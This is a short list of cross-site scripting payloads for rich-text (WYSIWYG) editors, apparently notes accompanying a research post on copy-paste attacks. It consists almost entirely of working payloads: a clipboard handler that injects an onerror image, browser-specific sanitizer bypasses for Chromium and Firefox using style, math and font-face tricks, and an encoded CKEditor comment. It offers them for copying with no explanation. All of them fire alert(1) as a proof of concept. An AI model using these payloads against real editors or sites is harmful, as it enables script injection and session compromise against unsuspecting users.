WYSIWYG XSS Payloads
Post
https://research.securitum.com/the-curious-case-of-copy-paste/
Payloads
Clipboard basic
document.oncopy = event => {
event.preventDefault();
event.clipboardData.setData('text/html', '<img src onerror=alert(1)>');
}
Chromium
(start)
a<math>b<xss style=display:block>c<style>d<a title="</style><img src onerror=alert(1)>">e
(end)
Copy me=> (start) a
Firefox
(start)
<style>
@import'';
@font-face { font-family: 'ab<\/style><img src onerror=alert(1)>'}
</style>
(end)
Copy me => (start)
(end)
CKEditor
(start)
A<!--{ce_protected}{C}%3C!%2D%2D%20comment%20%2D%2D%3E-->B
(end)
Copy me => (start) AB (end)